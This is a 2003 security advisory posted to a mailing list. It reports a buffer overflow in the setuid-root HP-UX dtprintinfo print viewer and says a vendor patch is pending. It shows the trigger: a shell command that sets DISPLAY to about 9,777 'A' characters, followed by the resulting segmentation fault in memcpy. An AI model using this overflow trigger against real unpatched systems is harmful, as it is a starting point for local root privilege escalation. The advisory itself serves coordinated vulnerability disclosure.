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Message-ID: <20031008181655.8958.qmail@webmaildomini1.aruba.it>
From: dante at alighieri.org (Davide Del Vecchio)
Subject: HPUX dtprintinfo buffer overflow vulnerability
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HPUX dtprintinfo buffer overflow vulnerability
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Davide Del Vecchio Adv#7
Discovered in: 14/07/2003
Date: 08/10/2003
Tested on HP-UX B.11.00
Description:
The Print Viewer program provides a graphical interface that displays
the status of print queues and print jobs.
dante@...ficino :/usr/dt/bin >ls -al /usr/dt/bin/dtprintinfo
-r-sr-xr-x 1 root bin 471040 Sep 22 2000 dtprintinfo
Exporting the DISPLAY variable with a long argument...
dante@...ficino :/usr/dt/bin >export DISPLAY="`perl -e 'printf "A" x 9777'`"
dante@...ficino :/usr/dt/bin >/usr/dt/bin/dtprintinfo
Memory fault
From gdb output we can see:
Program received signal SIGSEGV, Segmentation fault.
0x7f75fb08 in memcpy () from /usr/lib/libc.2
Solution:
I'm in contact with HP's Security staff, especially with John Morris,
and I would like to thanks him and all his staff for the interest
demonstrated during this period of research on HP-UX.
He assured me a patch has been written and an Official Security Bullettin
will follow my advisory.
Credits:
Davide Del Vecchio would like to thank all the people supporting him
and his research, his love that never leaves him alone, and obvious,
the HP-UX security staff, impersonified in this case by John Morris.
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Please send suggestions, updates, and comments to:
Davide Del Vecchio , Dante Alighieri - dante at alighieri dot org
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